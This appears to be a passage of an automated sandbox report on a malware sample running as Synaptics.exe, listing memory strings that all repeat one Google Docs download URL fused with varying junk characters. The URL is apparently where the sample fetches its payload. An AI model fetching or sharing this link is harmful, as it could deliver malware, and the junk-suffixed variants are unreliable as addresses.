                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1441798658.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade
                              Source: Synaptics.exe, 00000003.00000002.1834388588.000000000F079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade-
                              Source: Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade.R
                              Source: Synaptics.exe, 00000003.00000002.1804199297.000000000054D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade.co
                              Source: Synaptics.exe, 00000003.00000003.1441798658.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade.com&nf-u
                              Source: Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadefral
                              Source: Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadek6
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadel
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadem
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1441798658.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadep
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeport
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadersio
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1814105855.0000000007A2C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadfT
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadflights-cn.net
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgj
                              Source: Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgl
                              Source: Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgooglesandbox-cn.com
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgr
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007BDF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh
                              Source: Synaptics.exe, 00000003.00000003.1441798658.0000000000593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhPC-Y
                              Source: Synaptics.exe, 00000003.00000002.1834388588.000000000F079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhc=/&
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhj7(
                              Source: Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi/
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiS
                              Source: Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadic
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadin4
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadion
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007ABB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjP
                              Source: Synaptics.exe, 00000003.00000002.1804199297.000000000054D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjecte
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjo1/D
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1814105855.0000000007A2C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1804199297.000000000054D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk&expq
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadkT
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1441798658.0000000000593000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1804199297.0000000000594000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1834388588.000000000F079000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1404566857.00000000005A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl.
                              Source: Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadle
                              Source: Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadle&
                              Source: Synaptics.exe, 00000003.00000002.1834388588.000000000F079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlx
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1804199297.000000000051D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1441798658.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm-facqm
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmV
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn
                              Source: Synaptics.exe, 00000003.00000003.1441798658.0000000000593000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1804199297.0000000000594000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1404566857.00000000005A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn%1
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnW
                              Source: Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnc
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1441798658.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnp
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadny
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado-stdo9
                              Source: Synaptics.exe, 00000003.00000003.1441798658.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadogle.
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoj./F
                              Source: Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadom
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadom:)Os
                              Source: Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoo
                              Source: Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoogl
                              Source: Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoogle
                              Source: Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadot
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1804199297.000000000054D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1441798658.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpp
                              Source: Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpt
                              Source: Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpu
                              Source: Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr
                              Source: Synaptics.exe, 00000003.00000003.1441798658.0000000000593000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1804199297.0000000000594000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1404566857.00000000005A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr%
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1441798658.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrSYs
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrj
                              Source: Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadro
                              Source: Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrojec
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrt-ur-
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1804199297.000000000051D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007ABB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1441798658.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads
                              Source: Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads.cn
                              Source: Synaptics.exe, 00000003.00000002.1804199297.000000000054D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads.doQ
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads/
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsS
                              Source: Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsearc
                              Source: Synaptics.exe, 00000003.00000002.1804199297.000000000054D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadserv;
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsn
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadstedCHT
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadstore
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007BDF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007ABB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt
                              Source: Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt-
                              Source: Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt.
                              Source: Synaptics.exe, 00000003.00000002.1834388588.000000000F079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadta
                              Source: Synaptics.exe, 00000003.00000002.1834388588.000000000F079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtd
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtent-
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtib
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtl
                              Source: Synaptics.exe, 00000003.00000003.1404566857.0000000000594000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadttJ
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadttippData
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtxj0
                              Source: Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduU
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadua-pl
